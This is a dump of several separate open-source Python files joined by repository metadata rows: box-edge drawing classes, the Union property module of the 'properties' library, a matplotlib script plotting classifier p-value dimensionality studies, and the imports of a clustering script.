self.hole_depth = hole_depth
def __call__(self, length, **kw):
hole_length = 16
upper_corner = 10
lower_corner = 6
depth = self.hole_depth - upper_corner - lower_corner
upper_edge = (length - hole_length - 2 * upper_corner) / 2
lower_edge = hole_length - 2 * lower_corner
self.polyline(
upper_edge,
(90, upper_corner),
depth,
(-90, lower_corner),
lower_edge,
(-90, lower_corner),
depth,
(90, upper_corner),
upper_edge,
)
class Bed2SidesEdge(edges.BaseEdge):
"""
    Edge that draws a bed-like shape, skipping the next corner.
    The next edge should be a NoopEdge.
"""
def __init__(self, boxes, bed_length, full_head_length, full_foot_height):
super(Bed2SidesEdge, self).__init__(boxes, None)
self.bed_length = bed_length
self.full_head_length = full_head_length
self.full_foot_height = full_foot_height
def __call__(self, bed_height, **kw):
foot_corner = 6
middle_corner = 3
head_corner = 10
foot_height = self.full_foot_height - self.thickness - foot_corner
head_length = self.full_head_length - head_corner - self.thickness
corners = foot_corner + middle_corner + head_corner
head_height = bed_height - foot_height - corners
middle_length = self.bed_length - head_length - corners
self.polyline(
foot_height,
(90, foot_corner),
middle_length,
(-90, middle_corner),
head_height,
(90, head_corner),
head_length,
)
class NoopEdge(edges.BaseEdge):
"""
    Edge that draws nothing; it neither turns nor moves.
"""
def __init__(self, boxes):
super(NoopEdge, self).__init__(boxes, None)
def __call__(self, length, **kw):
# cancel turn
self.corner(-90)
| gpl-3.0 | 6,987,736,483,937,999,000 | 31.537473 | 158 | 0.551366 | false | 3.83809 | false | false | false |
aranzgeo/properties | properties/base/union.py | 2 | 9323 | """union.py: Union property"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from warnings import warn
from six import PY2
from .base import GENERIC_ERRORS, HasProperties
from .instance import Instance
from .. import basic
from .. import utils
if PY2:
from types import ClassType #pylint: disable=no-name-in-module
CLASS_TYPES = (type, ClassType)
else:
CLASS_TYPES = (type,)
class Union(basic.Property):
"""Property with multiple valid Property types
**Union** Properties contain a list of :ref:`property` instances.
    Validation, serialization, etc. cycle through the corresponding method
    on each Property instance sequentially until one succeeds. If all
Property types raise an error, the Union Property will also raise an
error.
.. note::
When specifying Property types, the order matters; if multiple
types are valid, the earlier type will be favored. For example,
.. code::
import properties
union_0 = properties.Union(
doc='String and Color',
props=(properties.String(''), properties.Color('')),
)
union_1 = properties.Union(
doc='String and Color',
props=(properties.Color(''), properties.String('')),
)
union_0.validate(None, 'red') == 'red' # Validates to string
union_1.validate(None, 'red') == (255, 0, 0) # Validates to color
**Available keywords** (in addition to those inherited from
:ref:`Property <property>`):
* **props** - A list of Property instances that each specify a valid
type for the Union Property. HasProperties classes may also be
specified; these are coerced to Instance Properties of the respective
class.
"""
class_info = 'a union of multiple property types'
def __init__(self, doc, props, **kwargs):
self.props = props
super(Union, self).__init__(doc, **kwargs)
self._unused_default_warning()
@property
def props(self):
"""List of valid property types or HasProperties classes"""
return self._props
@props.setter
def props(self, value):
if not isinstance(value, (tuple, list)):
raise TypeError('props must be a list')
new_props = tuple()
for prop in value:
if (isinstance(prop, CLASS_TYPES) and
issubclass(prop, HasProperties)):
prop = Instance('', prop)
if not isinstance(prop, basic.Property):
raise TypeError('props must be Property instances or '
'HasProperties classes')
new_props += (prop,)
self._props = new_props
@property
def strict_instances(self):
"""Require input dictionaries for instances to be valid
If True, this passes :code:`strict=True` and
:code:`assert_valid=True` to the instance
deserializer, ensuring the instance is valid.
Default is False.
"""
return getattr(self, '_strict_instances', False)
@strict_instances.setter
def strict_instances(self, value):
if not isinstance(value, bool):
raise TypeError('strict_instances must be a boolean')
self._strict_instances = value
@property
def info(self):
"""Description of the property, supplemental to the basic doc"""
return ' or '.join([p.info or 'any value' for p in self.props])
@property
def name(self):
"""The name of the property on a HasProperties class
This is set in the metaclass. For Unions, props inherit the name.
"""
return getattr(self, '_name', '')
@name.setter
def name(self, value):
for prop in self.props:
prop.name = value
self._name = value
@property
def default(self):
"""Default value of the property"""
prop_def = getattr(self, '_default', utils.undefined)
for prop in self.props:
if prop.default is utils.undefined:
continue
if prop_def is utils.undefined:
prop_def = prop.default
break
return prop_def
@default.setter
def default(self, value):
if value is utils.undefined:
self._default = value
return
for prop in self.props:
try:
if callable(value):
prop.validate(None, value())
else:
prop.validate(None, value)
self._default = value
return
except GENERIC_ERRORS:
continue
raise TypeError('Invalid default for Union property')
def _unused_default_warning(self):
prop_def = getattr(self, '_default', utils.undefined)
for prop in self.props:
if prop.default is utils.undefined:
continue
if prop_def is utils.undefined:
prop_def = prop.default
elif prop_def != prop.default:
warn('Union prop default ignored: {}'.format(prop.default),
RuntimeWarning)
def _try_prop_method(self, instance, value, method_name):
"""Helper method to perform a method on each of the union props
This method gathers all errors and returns them at the end
if the method on each of the props fails.
"""
error_messages = []
for prop in self.props:
try:
return getattr(prop, method_name)(instance, value)
except GENERIC_ERRORS as err:
if hasattr(err, 'error_tuples'):
error_messages += [
err_tup.message for err_tup in err.error_tuples
]
if error_messages:
extra = 'Possible explanation:'
for message in error_messages:
extra += '\n - {}'.format(message)
else:
extra = ''
self.error(instance, value, extra=extra)
def validate(self, instance, value):
"""Check if value is a valid type of one of the Union props"""
return self._try_prop_method(instance, value, 'validate')
def assert_valid(self, instance, value=None):
"""Check if the Union has a valid value"""
valid = super(Union, self).assert_valid(instance, value)
if not valid:
return False
if value is None:
value = instance._get(self.name)
if value is None:
return True
return self._try_prop_method(instance, value, 'assert_valid')
def serialize(self, value, **kwargs):
"""Return a serialized value
If no serializer is provided, it uses the serialize method of the
prop corresponding to the value
"""
kwargs.update({'include_class': kwargs.get('include_class', True)})
if self.serializer is not None:
return self.serializer(value, **kwargs)
if value is None:
return None
for prop in self.props:
try:
prop.validate(None, value)
except GENERIC_ERRORS:
continue
return prop.serialize(value, **kwargs)
return self.to_json(value, **kwargs)
def deserialize(self, value, **kwargs):
"""Return a deserialized value
If no deserializer is provided, it uses the deserialize method of the
prop corresponding to the value
"""
kwargs.update({'trusted': kwargs.get('trusted', False)})
if self.deserializer is not None:
return self.deserializer(value, **kwargs)
if value is None:
return None
instance_props = [
prop for prop in self.props if isinstance(prop, Instance)
]
kwargs = kwargs.copy()
kwargs.update({
'strict': kwargs.get('strict') or self.strict_instances,
'assert_valid': self.strict_instances,
})
if isinstance(value, dict) and value.get('__class__'):
clsname = value.get('__class__')
for prop in instance_props:
if clsname == prop.instance_class.__name__:
return prop.deserialize(value, **kwargs)
for prop in self.props:
try:
out_val = prop.deserialize(value, **kwargs)
prop.validate(None, out_val)
return out_val
except GENERIC_ERRORS:
continue
return self.from_json(value, **kwargs)
def equal(self, value_a, value_b):
return any((prop.equal(value_a, value_b) for prop in self.props))
@staticmethod
def to_json(value, **kwargs):
"""Return value, serialized if value is a HasProperties instance"""
if isinstance(value, HasProperties):
return value.serialize(**kwargs)
return value
def sphinx_class(self):
"""Redefine sphinx class to provide doc links to types of props"""
return ', '.join(p.sphinx_class() for p in self.props)
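# Usage sketch (not part of the module; runnable only where the
# ``properties`` package is importable). It mirrors the example in the
# Union docstring above:
#
#     import properties
#
#     class Shape(properties.HasProperties):
#         fill = properties.Union(
#             'color name or RGB triple',
#             props=(properties.Color(''), properties.String('')),
#         )
#
#     shape = Shape()
#     shape.fill = 'red'  # validated by the first matching prop (Color),
#                         # so it is coerced to (255, 0, 0)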
| mit | -3,137,872,113,707,390,500 | 34.048872 | 113 | 0.576424 | false | 4.645242 | false | false | false |
weissercn/MLTools | Dalitz_simplified/evaluation_of_optimised_classifiers/gaussian_same_projection_on_each_axis_analysis/plot_gauss_dimenionality_analysis.py | 1 | 21737 | import sys
import numpy as np
import matplotlib.pyplot as plt
import os
# Options for mode 'single_p_values','ensemble', 'ensemble_redefined', 'ensemble_redefined_noCPV', 'ensemble_redefined_optimised', 'ensemble_redefined_noCPV_optimised'
MODE= 'ensemble_redefined_noCPV_optimised'
if MODE == 'single_p_values':
dimensions=[2,3,4,5,6,7,8,9,10]
print("Gaussian same projection on each axis dimensional analysis \n")
p_bdt = []
for dim in dimensions:
temp = np.loadtxt("../bdt_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection__0_1__0_085_bdt_p_values')
p_bdt.append(temp)
print("Boosted decision tree : ", p_bdt)
p_svm = []
for dim in dimensions:
temp = np.loadtxt("../svm_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection__0_1__0_085_svm_p_values')
p_svm.append(temp)
print("Support vector machine : ", p_svm)
p_nn = []
for dim in dimensions:
temp = np.loadtxt("../nn_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection__0_1__0_085_nn_4layers_100neurons_onehot_p_values')
p_nn.append(temp)
print("Neural Network : ", p_nn)
p_miranda_2bins = []
for dim in dimensions:
temp = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_p_value_distribution__0_1__0_085_CPV_miranda_"+ str(dim)+ "D_2_bins_p_values")
p_miranda_2bins.append(temp)
print("Miranda 2 bins : ",p_miranda_2bins )
p_miranda_3bins = [ ]
for dim in dimensions:
temp = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_p_value_distribution__0_1__0_085_CPV_miranda_"+ str(dim)+ "D_3_bins_p_values")
p_miranda_3bins.append(temp)
print("Miranda 3 bins : ",p_miranda_3bins )
p_miranda_5bins = [ ]
for dim in dimensions:
temp = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_p_value_distribution__0_1__0_085_CPV_miranda_"+ str(dim)+ "D_5_bins_p_values")
p_miranda_5bins.append(temp)
print("Miranda 5 bins : ",p_miranda_5bins )
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(dimensions,p_bdt,label="bdt ",color='darkorange')
ax.plot(dimensions,p_svm,label="svm ",color='lawngreen')
ax.plot(dimensions,p_nn,label="nn 4l 100n ",color='blueviolet')
ax.plot(dimensions,p_miranda_2bins,label="Miranda 2bins",color='red')
ax.plot(dimensions,p_miranda_3bins,label="Miranda 3bins",color='indianred')
ax.plot(dimensions,p_miranda_5bins,label="Miranda 5bins",color='saddlebrown')
ax.set_yscale('log')
    # A lower limit of 0 is invalid on a log-scaled axis; use a small
    # positive bound instead (1e-5 is an arbitrary choice).
    plt.ylim([1e-5, 1])
ax.set_xlabel("Number of dimensions")
ax.set_ylabel("P value")
ax.set_title("Dimensionality analysis gaussian same projection sigmas perp .1 and 0.085")
ax.legend(loc='lower left')
fig_name="gaussian_same_projection__0_1__0_085_dimensionality_analysis"
fig.savefig(fig_name)
fig.savefig("../bdt_gaussian_same_projection/"+fig_name)
fig.savefig("../svm_gaussian_same_projection/"+fig_name)
fig.savefig("../nn_gaussian_same_projection/"+fig_name)
fig.savefig("../miranda_gaussian_same_projection/"+fig_name)
print("Saved the figure as" , fig_name+".png")
elif MODE == 'ensemble':
dimensions=[2,3,4,5,6,7,8,9,10]
p_1_bdt = []
p_2_bdt = []
p_3_bdt = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../bdt_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection__0_1__0_085_bdt_p_values_1_2_3_std_dev.txt')
p_1_bdt.append(temp1), p_2_bdt.append(temp2), p_3_bdt.append(temp3)
print("Boosted decision tree : ", p_1_bdt,p_2_bdt,p_3_bdt)
p_1_svm = []
p_2_svm = []
p_3_svm = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../svm_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection__0_1__0_085_svm_ensemble_p_values_1_2_3_std_dev.txt')
p_1_svm.append(temp1), p_2_svm.append(temp2), p_3_svm.append(temp3)
print("Support vector machine : ", p_1_svm,p_2_svm,p_3_svm)
p_1_miranda_2bins = []
p_2_miranda_2bins = []
p_3_miranda_2bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_p_value_distribution__0_1__0_085_CPV_miranda_"+str(dim)+'D_2_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_2bins.append(temp1), p_2_miranda_2bins.append(temp2), p_3_miranda_2bins.append(temp3)
print("Miranda 2 bins: ", p_1_miranda_2bins,p_2_miranda_2bins,p_3_miranda_2bins)
p_1_miranda_3bins = []
p_2_miranda_3bins = []
p_3_miranda_3bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_p_value_distribution__0_1__0_085_CPV_miranda_"+str(dim)+'D_3_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_3bins.append(temp1), p_2_miranda_3bins.append(temp2), p_3_miranda_3bins.append(temp3)
print("Miranda 3 bins: ", p_1_miranda_3bins,p_2_miranda_3bins,p_3_miranda_3bins)
p_1_miranda_5bins = []
p_2_miranda_5bins = []
p_3_miranda_5bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_p_value_distribution__0_1__0_085_CPV_miranda_"+str(dim)+'D_5_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_5bins.append(temp1), p_2_miranda_5bins.append(temp2), p_3_miranda_5bins.append(temp3)
print("Miranda 5 bins: ", p_1_miranda_5bins,p_2_miranda_5bins,p_3_miranda_5bins)
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(dimensions,p_2_bdt,label="bdt 2$\sigma$",color='darkorange')
ax.plot(dimensions,p_2_svm,label="svm 2$\sigma$",color='lawngreen')
ax.plot(dimensions,p_2_miranda_2bins,label="Miranda 2bins 2$\sigma$",color='red')
ax.plot(dimensions,p_2_miranda_3bins,label="Miranda 3bins 2$\sigma$",color='indianred')
ax.plot(dimensions,p_2_miranda_5bins,label="Miranda 5bins 2$\sigma$",color='saddlebrown')
plt.ylim([-5,105])
ax.set_xlabel("Number of dimensions")
ax.set_ylabel("Number of samples")
ax.set_title("Dimensionality analysis")
ax.legend(loc='right')
fig_name="gaussian_same_projection__0_1__0_085_ensemble_dimensionality_analysis"
fig.savefig(fig_name)
fig.savefig("../bdt_gaussian_same_projection/"+fig_name)
fig.savefig("../svm_gaussian_same_projection/"+fig_name)
fig.savefig("../miranda_gaussian_same_projection/"+fig_name)
print("Saved the figure as" , fig_name+".png")
elif MODE == 'ensemble_redefined':
dimensions=[2,3,4,5,6,7,8,9,10]
p_1_bdt = []
p_2_bdt = []
p_3_bdt = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../bdt_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_075_bdt_p_values_1_2_3_std_dev.txt')
p_1_bdt.append(temp1), p_2_bdt.append(temp2), p_3_bdt.append(temp3)
print("Boosted decision tree : ", p_1_bdt,p_2_bdt,p_3_bdt)
p_1_svm = []
p_2_svm = []
p_3_svm = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../svm_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_075_svm_p_values_1_2_3_std_dev.txt')
p_1_svm.append(temp1), p_2_svm.append(temp2), p_3_svm.append(temp3)
print("Support vector machine : ", p_1_svm,p_2_svm,p_3_svm)
p_1_miranda_2bins = []
p_2_miranda_2bins = []
p_3_miranda_2bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_075_CPV_miranda_"+str(dim)+'D_2_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_2bins.append(temp1), p_2_miranda_2bins.append(temp2), p_3_miranda_2bins.append(temp3)
print("Miranda 2 bins: ", p_1_miranda_2bins,p_2_miranda_2bins,p_3_miranda_2bins)
p_1_miranda_3bins = []
p_2_miranda_3bins = []
p_3_miranda_3bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_075_CPV_miranda_"+str(dim)+'D_3_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_3bins.append(temp1), p_2_miranda_3bins.append(temp2), p_3_miranda_3bins.append(temp3)
print("Miranda 3 bins: ", p_1_miranda_3bins,p_2_miranda_3bins,p_3_miranda_3bins)
p_1_miranda_5bins = []
p_2_miranda_5bins = []
p_3_miranda_5bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_075_CPV_miranda_"+str(dim)+'D_5_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_5bins.append(temp1), p_2_miranda_5bins.append(temp2), p_3_miranda_5bins.append(temp3)
print("Miranda 5 bins: ", p_1_miranda_5bins,p_2_miranda_5bins,p_3_miranda_5bins)
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(dimensions,p_2_bdt,label="bdt 2$\sigma$",color='darkorange')
ax.plot(dimensions,p_2_svm,label="svm 2$\sigma$",color='lawngreen')
ax.plot(dimensions,p_2_miranda_2bins,label="Miranda 2bins 2$\sigma$",color='red')
ax.plot(dimensions,p_2_miranda_3bins,label="Miranda 3bins 2$\sigma$",color='indianred')
ax.plot(dimensions,p_2_miranda_5bins,label="Miranda 5bins 2$\sigma$",color='saddlebrown')
plt.ylim([-5,120])
ax.set_xlabel("Number of dimensions")
ax.set_ylabel("Number of samples")
ax.set_title("Dimensionality analysis redefined 0.075")
ax.legend(loc='upper left')
fig_name="gaussian_same_projection_redefined__0_1__0_075_ensemble_dimensionality_analysis"
fig.savefig(fig_name)
fig.savefig("../bdt_gaussian_same_projection/"+fig_name)
fig.savefig("../svm_gaussian_same_projection/"+fig_name)
fig.savefig("../miranda_gaussian_same_projection/"+fig_name)
print("Saved the figure as" , fig_name+".png")
elif MODE == 'ensemble_redefined_noCPV':
dimensions=[2,3,4,5,6,7,8,9,10]
p_1_bdt = []
p_2_bdt = []
p_3_bdt = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../bdt_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_1_noCPV_bdt_p_values_1_2_3_std_dev.txt')
p_1_bdt.append(temp1), p_2_bdt.append(temp2), p_3_bdt.append(temp3)
print("Boosted decision tree : ", p_1_bdt,p_2_bdt,p_3_bdt)
p_1_svm = []
p_2_svm = []
p_3_svm = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../svm_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_1_noCPV_svm_p_values_1_2_3_std_dev.txt')
p_1_svm.append(temp1), p_2_svm.append(temp2), p_3_svm.append(temp3)
print("Support vector machine : ", p_1_svm,p_2_svm,p_3_svm)
p_1_miranda_2bins = []
p_2_miranda_2bins = []
p_3_miranda_2bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_1_noCPV_miranda_"+str(dim)+'D_2_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_2bins.append(temp1), p_2_miranda_2bins.append(temp2), p_3_miranda_2bins.append(temp3)
print("Miranda 2 bins: ", p_1_miranda_2bins,p_2_miranda_2bins,p_3_miranda_2bins)
p_1_miranda_3bins = []
p_2_miranda_3bins = []
p_3_miranda_3bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_1_noCPV_miranda_"+str(dim)+'D_3_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_3bins.append(temp1), p_2_miranda_3bins.append(temp2), p_3_miranda_3bins.append(temp3)
print("Miranda 3 bins: ", p_1_miranda_3bins,p_2_miranda_3bins,p_3_miranda_3bins)
p_1_miranda_5bins = []
p_2_miranda_5bins = []
p_3_miranda_5bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_1_noCPV_miranda_"+str(dim)+'D_5_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_5bins.append(temp1), p_2_miranda_5bins.append(temp2), p_3_miranda_5bins.append(temp3)
print("Miranda 5 bins: ", p_1_miranda_5bins,p_2_miranda_5bins,p_3_miranda_5bins)
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(dimensions,p_2_bdt,label="bdt 2$\sigma$",color='darkorange')
ax.plot(dimensions,p_2_svm,label="svm 2$\sigma$",color='lawngreen')
ax.plot(dimensions,p_2_miranda_2bins,label="Miranda 2bins 2$\sigma$",color='red')
ax.plot(dimensions,p_2_miranda_3bins,label="Miranda 3bins 2$\sigma$",color='indianred')
ax.plot(dimensions,p_2_miranda_5bins,label="Miranda 5bins 2$\sigma$",color='saddlebrown')
plt.ylim([-5,105])
ax.set_xlabel("Number of dimensions")
ax.set_ylabel("Number of samples")
ax.set_title("Dimensionality analysis redefined noCPV")
ax.legend(loc='right')
fig_name="gaussian_same_projection_redefined__0_1__0_1_noCPV_ensemble_dimensionality_analysis"
fig.savefig(fig_name)
fig.savefig("../bdt_gaussian_same_projection/"+fig_name)
fig.savefig("../svm_gaussian_same_projection/"+fig_name)
fig.savefig("../miranda_gaussian_same_projection/"+fig_name)
print("Saved the figure as" , fig_name+".png")
elif MODE == 'ensemble_redefined_optimised':
dimensions=[2,3,4,5,6,7,8,9,10]
p_1_bdt = []
p_2_bdt = []
p_3_bdt = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../bdt_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_075_optimised_bdt_p_values_1_2_3_std_dev.txt')
p_1_bdt.append(temp1), p_2_bdt.append(temp2), p_3_bdt.append(temp3)
print("Boosted decision tree : ", p_1_bdt,p_2_bdt,p_3_bdt)
p_1_svm = []
p_2_svm = []
p_3_svm = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../svm_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_075_optimised_svm_p_values_1_2_3_std_dev.txt')
p_1_svm.append(temp1), p_2_svm.append(temp2), p_3_svm.append(temp3)
print("Support vector machine : ", p_1_svm,p_2_svm,p_3_svm)
p_1_nn = []
p_2_nn = []
p_3_nn = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../nn_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_075_optimised_p_values_1_2_3_std_dev.txt')
p_1_nn.append(temp1), p_2_nn.append(temp2), p_3_nn.append(temp3)
print("Boosted decision tree : ", p_1_bdt,p_2_bdt,p_3_bdt)
p_1_miranda_2bins = []
p_2_miranda_2bins = []
p_3_miranda_2bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_075_CPV_miranda_"+str(dim)+'D_2_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_2bins.append(temp1), p_2_miranda_2bins.append(temp2), p_3_miranda_2bins.append(temp3)
print("Miranda 2 bins: ", p_1_miranda_2bins,p_2_miranda_2bins,p_3_miranda_2bins)
p_1_miranda_3bins = []
p_2_miranda_3bins = []
p_3_miranda_3bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_075_CPV_miranda_"+str(dim)+'D_3_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_3bins.append(temp1), p_2_miranda_3bins.append(temp2), p_3_miranda_3bins.append(temp3)
print("Miranda 3 bins: ", p_1_miranda_3bins,p_2_miranda_3bins,p_3_miranda_3bins)
p_1_miranda_5bins = []
p_2_miranda_5bins = []
p_3_miranda_5bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_075_CPV_miranda_"+str(dim)+'D_5_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_5bins.append(temp1), p_2_miranda_5bins.append(temp2), p_3_miranda_5bins.append(temp3)
print("Miranda 5 bins: ", p_1_miranda_5bins,p_2_miranda_5bins,p_3_miranda_5bins)
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(dimensions,p_2_bdt,label="bdt 2$\sigma$",color='darkorange')
ax.plot(dimensions,p_2_svm,label="svm 2$\sigma$",color='lawngreen')
ax.plot(dimensions,p_2_nn,label="nn 2$\sigma$",color='blue')
ax.plot(dimensions,p_2_miranda_2bins,label="Miranda 2bins 2$\sigma$",color='red')
ax.plot(dimensions,p_2_miranda_3bins,label="Miranda 3bins 2$\sigma$",color='indianred')
ax.plot(dimensions,p_2_miranda_5bins,label="Miranda 5bins 2$\sigma$",color='saddlebrown')
plt.ylim([-5,120])
ax.set_xlabel("Number of dimensions")
ax.set_ylabel("Number of samples")
ax.set_title("Dimensionality analysis redefined 0.075")
ax.legend(loc='best')
fig_name="gaussian_same_projection_redefined__0_1__0_075_optimised_ensemble_dimensionality_analysis"
fig.savefig(fig_name)
fig.savefig("../bdt_gaussian_same_projection/"+fig_name)
fig.savefig("../svm_gaussian_same_projection/"+fig_name)
fig.savefig("../miranda_gaussian_same_projection/"+fig_name)
print("Saved the figure as" , fig_name+".png")
elif MODE == 'ensemble_redefined_noCPV_optimised':
dimensions=[2,3,4,5,6,7,8,9,10]
p_1_bdt = []
p_2_bdt = []
p_3_bdt = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../bdt_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_1_noCPV_optimised_bdt_p_values_1_2_3_std_dev.txt')
p_1_bdt.append(temp1), p_2_bdt.append(temp2), p_3_bdt.append(temp3)
print("Boosted decision tree : ", p_1_bdt,p_2_bdt,p_3_bdt)
p_1_svm = []
p_2_svm = []
p_3_svm = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../svm_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_1_noCPV_optimised_svm_p_values_1_2_3_std_dev.txt')
p_1_svm.append(temp1), p_2_svm.append(temp2), p_3_svm.append(temp3)
print("Support vector machine : ", p_1_svm,p_2_svm,p_3_svm)
p_1_nn = []
p_2_nn = []
p_3_nn = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../nn_gaussian_same_projection/"+str(dim)+'Dgaussian_same_projection_redefined__0_1__0_1_noCPV_optimised_p_values_1_2_3_std_dev.txt')
p_1_nn.append(temp1), p_2_nn.append(temp2), p_3_nn.append(temp3)
print("Neural Network 3 layers with 33 neurons : ", p_1_nn,p_2_nn,p_3_nn)
p_1_miranda_2bins = []
p_2_miranda_2bins = []
p_3_miranda_2bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_1_noCPV_miranda_"+str(dim)+'D_2_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_2bins.append(temp1), p_2_miranda_2bins.append(temp2), p_3_miranda_2bins.append(temp3)
print("Miranda 2 bins: ", p_1_miranda_2bins,p_2_miranda_2bins,p_3_miranda_2bins)
p_1_miranda_3bins = []
p_2_miranda_3bins = []
p_3_miranda_3bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_1_noCPV_miranda_"+str(dim)+'D_3_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_3bins.append(temp1), p_2_miranda_3bins.append(temp2), p_3_miranda_3bins.append(temp3)
print("Miranda 3 bins: ", p_1_miranda_3bins,p_2_miranda_3bins,p_3_miranda_3bins)
p_1_miranda_5bins = []
p_2_miranda_5bins = []
p_3_miranda_5bins = []
for dim in range(2,11):
temp1,temp2,temp3 = np.loadtxt("../miranda_gaussian_same_projection/gaussian_same_projection_redefined_p_value_distribution__0_1__0_1_noCPV_miranda_"+str(dim)+'D_5_bins_p_values_1_2_3_std_dev.txt')
p_1_miranda_5bins.append(temp1), p_2_miranda_5bins.append(temp2), p_3_miranda_5bins.append(temp3)
print("Miranda 5 bins: ", p_1_miranda_5bins,p_2_miranda_5bins,p_3_miranda_5bins)
fig = plt.figure()
ax = fig.add_subplot(1,1,1)
ax.plot(dimensions,p_2_bdt,label="bdt 2$\sigma$",color='darkorange')
ax.plot(dimensions,p_2_svm,label="svm 2$\sigma$",color='lawngreen')
ax.plot(dimensions,p_2_nn,label="nn 2$\sigma$",color='blue')
ax.plot(dimensions,p_2_miranda_2bins,label="Miranda 2bins 2$\sigma$",color='red')
ax.plot(dimensions,p_2_miranda_3bins,label="Miranda 3bins 2$\sigma$",color='indianred')
ax.plot(dimensions,p_2_miranda_5bins,label="Miranda 5bins 2$\sigma$",color='saddlebrown')
plt.ylim([-5,105])
ax.set_xlabel("Number of dimensions")
ax.set_ylabel("Number of samples")
ax.set_title("Dimensionality analysis redefined noCPV")
ax.legend(loc='right')
fig_name="gaussian_same_projection_redefined__0_1__0_1_noCPV_optimised_ensemble_dimensionality_analysis"
fig.savefig(fig_name)
fig.savefig("../bdt_gaussian_same_projection/"+fig_name)
fig.savefig("../svm_gaussian_same_projection/"+fig_name)
fig.savefig("../miranda_gaussian_same_projection/"+fig_name)
print("Saved the figure as" , fig_name+".png")
else:
print("No valid mode entered")
| mit | 7,951,414,230,523,062,000 | 46.66886 | 213 | 0.643097 | false | 2.567868 | false | false | false |
jaytlennon/Image-Analysis | python/using_scikit_learn_clustering.py | 4 | 1566 | from itertools import cycle
from time import time
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.colors as colors
from sklearn.cluster import Birch
from PIL import Image
import os
